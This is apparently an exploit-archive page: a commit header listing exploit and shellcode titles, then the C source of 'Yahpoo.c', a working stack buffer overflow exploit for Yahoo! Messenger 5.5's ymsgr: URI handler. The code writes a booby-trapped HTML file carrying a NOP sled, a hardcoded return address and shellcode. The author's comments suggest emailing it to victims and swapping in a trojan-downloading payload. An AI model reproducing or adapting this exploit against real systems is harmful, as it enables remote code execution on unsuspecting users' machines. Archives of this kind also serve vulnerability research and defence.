880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
119 lines
No EOL
4.4 KiB
C
119 lines
No EOL
4.4 KiB
C
// source: https://www.securityfocus.com/bid/4837/info
|
|
|
|
Yahoo! Messenger configures the 'ymsgr:' URI handler when it is installed. The handler invokes YPAGER.EXE with the supplied parameters. YPAGER.EXE accepts the 'call' argument; it is used for starting the 'Call Center' feature.
|
|
|
|
There is a stack overrun condition in the 'Call Center' component that may be exploited through a specially constructed URI. It has been reported that the stack frame of the affected function will be corrupted if the argument to the 'call' parameter passed to YPAGER.EXE is of 268 bytes or greater in length.
|
|
|
|
Attackers may exploit this vulnerability to execute arbitrary code.
|
|
|
|
/* Yahpoo.c by bob@dtors.net [www.dtors.net] [DSR]
|
|
*
|
|
* Why Yahoo Messenger have not fixed this vulnerbility
|
|
* I dont know...but either way they are stupid!
|
|
*
|
|
* This exploit has been tested on:
|
|
* Yahoo Messenger 5,5,0,1246
|
|
* Yahoo Module 5,5,0,454
|
|
*
|
|
* For:
|
|
* Windows 2000 Professional 5.0.2195 SP3
|
|
*
|
|
* Rave@dtors.net has released a windows [exe] version of this
|
|
* exploit but for Windows XP Pro SP1.
|
|
* So both targets are vulnerable XP/2k...some addresses might need changing.
|
|
*
|
|
* Problems that may occur:
|
|
*
|
|
* The addresses used may vary from box to box..so they might need changing.
|
|
* The stack may keep on changing the location of your shellcode address..you
|
|
* need to hit a static sector that will not alternate. [this is the reason we jmp]
|
|
* There exist two crashes...the first one we bypass..this is the access violation
|
|
* when you hit the nop sled the first time round. The second crash is where we
|
|
* hit the nop sled...so dont get confused between the 2.
|
|
*
|
|
* The shellcode used here...will not do anything malicious..just opens a popup box
|
|
* You can change this shellcode to something else...but the buffer is not very big
|
|
* so there is no chance of a bind shell or anything.
|
|
* Sloth from nopninjas.com has a shellcode that will download a trojan
|
|
* and execute it. Nice and small as well ;)
|
|
*
|
|
* Thats about it...this exploit will lead to remote command execution on the
|
|
* victim. Bare in mind this is triggered via bad URI handling...and the victim
|
|
* needs to actually view the evil html file..this can be done automatically via
|
|
* email >:)
|
|
*
|
|
* Big Lovin to rica.
|
|
* Thanks to rave for his time.
|
|
* Greetz:
|
|
* mercy, Redg, opy, phreez, eSDee, ilja, looney, The_itch, angelo, inv, kokanin,
|
|
* macd, SiRVu|can, Sally, Lucipher, gloomy, phaze, uproot, b0f.
|
|
* special thanks to sloth@nopninjas
|
|
*
|
|
*
|
|
* bob@dtors.net www.dtors.net
|
|
*/
|
|
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <string.h>
|
|
#define MessageBoxA "\x1d\x97\x53\x01"
|
|
|
|
|
|
char ret[8]= "\xD5\x96\x7A\x01";
|
|
|
|
|
|
unsigned char win32_msgbox[] = {
|
|
"\xEB\x19\x5E\x33\xC9\x89\x4E\x05\xB8" MessageBoxA "\x2D\x01\x01"
|
|
"\x01\x01\x8B\x18\x6A\x10\x56\x56\x51\xFF\xD3\xE8\xE2\xFF\xFF\xFF"
|
|
"\x62\x6f\x62\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
|
|
};
|
|
|
|
int main(int argc,char *argv[])
|
|
{
|
|
FILE *evil;
|
|
char *shellcode = win32_msgbox;
|
|
unsigned char buffer[5000];
|
|
int offset=320;
|
|
|
|
fprintf(stdout, "\n\tYahPoo.c By bob.\n");
|
|
fprintf(stdout, "Remote Exploit for Yahoo! Messenger 5.5\n");
|
|
fprintf(stdout, "\tDSR-[www.dtors.net]-DSR\n\n");
|
|
|
|
fprintf(stdout,"Makin' da EbUL HTML File... ");
|
|
if ((evil =fopen("yahoo.html","w"))==NULL){
|
|
fprintf(stderr,"Failed\n");
|
|
exit(1);
|
|
} else {
|
|
fprintf(stderr,"Opened!\n");
|
|
}
|
|
|
|
|
|
|
|
memset(buffer,0x00,offset+32+strlen(shellcode));
|
|
memset(buffer,0x90,offset);
|
|
|
|
|
|
memcpy(buffer+offset,ret,4);
|
|
memcpy(buffer+offset+4,shellcode,strlen(shellcode));
|
|
|
|
buffer[264] = 0xD4; //address of &shellcode
|
|
buffer[265] = 0x96;
|
|
buffer[266] = 0x7A;
|
|
buffer[267] = 0x01;
|
|
|
|
buffer[272] = 0xF5; //jmp 0xc [msvcrt.dll]
|
|
buffer[273] = 0x01;
|
|
buffer[274] = 0x01;
|
|
buffer[275] = 0x78;
|
|
|
|
fprintf(evil,"<html>");
|
|
fprintf(evil,"<title>Bought to you by dtors.net!</title>\n");
|
|
fprintf(evil,"<B>Dtors Security Research (DSR)</B>\n");
|
|
fprintf(evil,"<p>Yahoo Messenger 5.5 exploit....</p>\n");
|
|
fprintf(evil,"<pre>");
|
|
fprintf(evil,"<a href=%cymsgr:call?%s%c>!EbUL Link!</a></body></pre></html>\x00\x00\x00",0x22,buffer,0x22);
|
|
fclose(evil); // <-- closing yahoo.html
|
|
|
|
fprintf(stdout,"\nDa ebUL HTML file is >>yahoo.html<<\nEnjoy!\nwww.dtors.net\n\n");
|
|
|
|
} //end main
|